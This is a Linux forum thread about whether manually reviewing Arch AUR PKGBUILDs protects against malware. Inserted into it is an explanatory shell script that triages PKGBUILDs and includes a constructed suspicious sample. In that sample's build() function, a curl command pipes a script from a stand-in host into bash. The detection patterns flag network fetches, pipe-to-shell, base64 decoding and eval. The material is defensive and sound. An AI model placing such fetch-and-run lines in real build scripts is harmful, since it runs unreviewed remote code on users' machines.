Personally I'm grateful to not need 3rd party packages
Image post by TheTwelveYearOld@lemmy.world to linuxmemes@lemmy.world (English) · 21 hours ago · 60 comments · 403 up / 8 down
Technus@lemmy.zip · 20 hours ago · 63 up / 2 down
Does anyone else manually review PKGBUILDs before installing or upgrading anything from the AUR?

JackbyDev@programming.dev · 8 hours ago · 4 up
Sort of, but I don't know what I'm looking for. It would be nice if folks explained what a bad one looks like.

prole@lemmy.blahaj.zone · 8 hours ago (edited) · 3 up
Look for comments that say "# THIS IS MALWARE"

tomkatt@lemmy.world · 18 hours ago (edited) · 45 up
I do, but not as closely or as often as I should. Recent malware is a reminder to be careful. I think I was starting to take the AUR for granted as a repo when really it's still the Wild West.

Overspark@feddit.nl · 14 hours ago · 7 up
Yeah, paru makes it pretty easy to do, and can also build packages in a chroot, adding some extra security.

Ŝan@piefed.zip · 11 hours ago · 6 up / 3 down
I keep hearing people say ðis like it's a defense against malware and supply chain attacks. Reviewing PKGBUILDs only protects against dumb laziness on ðe part of ðe attacker, like ðey just install a stupidly obvious binary called "virus". What are you checking for in ðe PKGBUILD?
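Ŝan's question ("what are you checking for?") and JackbyDev's ("what does a bad one look like?") both come down to a short list of patterns a reviewer reads most carefully. The script below is an added example written for this thread; it is not code from anyone posting here, nor from paru or makepkg. It does a first-pass static triage of a PKGBUILD and flags: checksum arrays containing 'SKIP', curl/wget/git clone inside the build functions, anything piped into a shell, base64/xxd decoding or eval, and installs into locations that run at boot or login. The package name, URLs and the checksum in the two embedded sample PKGBUILDs are constructed for the demo (the "clean" checksum is just a placeholder hex value).

```shell
#!/bin/sh
# Added example (not from the thread, paru or makepkg): first-pass static
# triage of a PKGBUILD before running makepkg/paru. It only greps for
# patterns that deserve a careful read; a clean result is not proof of safety.
set -u

# Constructed sample PKGBUILD showing several review-worthy patterns
# (assumption: "example-tool", its URLs and paths are made up).
write_suspicious_pkgbuild() {
  cat > "$1" <<'EOF'
pkgname=example-tool
pkgver=1.2.0
pkgrel=1
arch=('x86_64')
url="https://github.com/example/example-tool"
source=("$pkgname-$pkgver.tar.gz::$url/archive/v$pkgver.tar.gz")
sha256sums=('SKIP')

build() {
  cd "$pkgname-$pkgver"
  curl -fsSL https://paste.example.invalid/setup | bash
  make
}

package() {
  cd "$pkgname-$pkgver"
  make DESTDIR="$pkgdir" install
  install -Dm644 example.service "$pkgdir/usr/lib/systemd/system/example.service"
}
EOF
}

# Constructed clean counterpart: pinned checksum (placeholder hex value),
# no network access during build, nothing installed into autostart paths.
write_clean_pkgbuild() {
  cat > "$1" <<'EOF'
pkgname=example-tool
pkgver=1.2.0
pkgrel=1
arch=('x86_64')
url="https://github.com/example/example-tool"
source=("$pkgname-$pkgver.tar.gz::$url/archive/v$pkgver.tar.gz")
sha256sums=('e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855')

build() {
  cd "$pkgname-$pkgver"
  make
}

package() {
  cd "$pkgname-$pkgver"
  make DESTDIR="$pkgdir" install
}
EOF
}

# Usage: pkgbuild_triage PKGBUILD
# Prints one "TAG: reason" line per finding and returns the number of
# findings, so 0 (nothing flagged) composes with && and if.
pkgbuild_triage() {
  f=$1
  n=0
  # Drop comment lines first so a "# never curl here" note does not trip a check.
  body=$(grep -v '^[[:space:]]*#' "$f")

  # 1. 'SKIP' in a checksum array: makepkg will not verify that download.
  if printf '%s\n' "$body" | grep -Eq "^(md5|sha1|sha256|sha512|b2)sums(_[a-z0-9_]+)?=.*'SKIP'"; then
    echo "CHECKSUM_SKIP: a checksum array contains SKIP, so that source is unverified"
    n=$((n + 1))
  fi
  # 2. Network access inside the functions: everything the build needs should
  #    be declared in source=() so makepkg fetches and checksums it.
  if printf '%s\n' "$body" | grep -Eq '^[[:space:]]*(curl|wget|git[[:space:]]+clone)[[:space:]]'; then
    echo "NETWORK_IN_FUNCTIONS: curl/wget/git clone used outside source=()"
    n=$((n + 1))
  fi
  # 3. Piping into a shell runs code that is never in the file you reviewed.
  if printf '%s\n' "$body" | grep -Eq '\|[[:space:]]*(sudo[[:space:]]+)?(ba|z|da)?sh([[:space:]]|$)'; then
    echo "PIPE_TO_SHELL: output is piped into a shell interpreter"
    n=$((n + 1))
  fi
  # 4. Obfuscation: decoding blobs or eval'ing strings has no place in a build.
  if printf '%s\n' "$body" | grep -Eq 'base64[[:space:]]+(-d|--decode)|xxd[[:space:]]+-r|^[[:space:]]*eval[[:space:]]'; then
    echo "ENCODED_OR_EVAL: base64/xxd decoding or eval present"
    n=$((n + 1))
  fi
  # 5. Files that run at boot or login: normal for daemons, but read them.
  if printf '%s\n' "$body" | grep -Eq 'systemd/(system|user)|/etc/(profile\.d|cron|xdg/autostart)'; then
    echo "AUTOSTART_PATH: installs into a systemd/cron/profile.d/autostart location"
    n=$((n + 1))
  fi
  return $n
}

# Self-demo on the constructed sample when run without arguments;
# pass a PKGBUILD path to triage a real file instead.
if [ $# -eq 0 ]; then
  demo=$(mktemp)
  write_suspicious_pkgbuild "$demo"
  pkgbuild_triage "$demo" || echo "flagged $? item(s); read those sections before building"
  rm -f "$demo"
else
  pkgbuild_triage "$1"
fi
```

A zero-finding run only says that makepkg will verify what it downloads and that the build does not reach out to the network on its own; it says nothing about whether the upstream tarball itself is trustworthy, which is the gap Ŝan is pointing at. Treat the tags as "read this section twice", and combine them with the chroot build Overspark mentions so that a package you misjudge has less to touch.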
0xD@infosec.pub · 11 hours ago · 2 up
Also with paru. I mainly check that the download shows the correct URL and does standard stuff with it.

nesc@lemmy.cafe · 14 hours ago · 4 up
I do, also most AUR helpers skip or make reviewing a chore.

Avicenna@lemmy.world · 11 hours ago · 2 up / 1 down
At the risk of getting downvoted, I wonder if an LLM would spot it.
(author and score not captured)
Yes, always!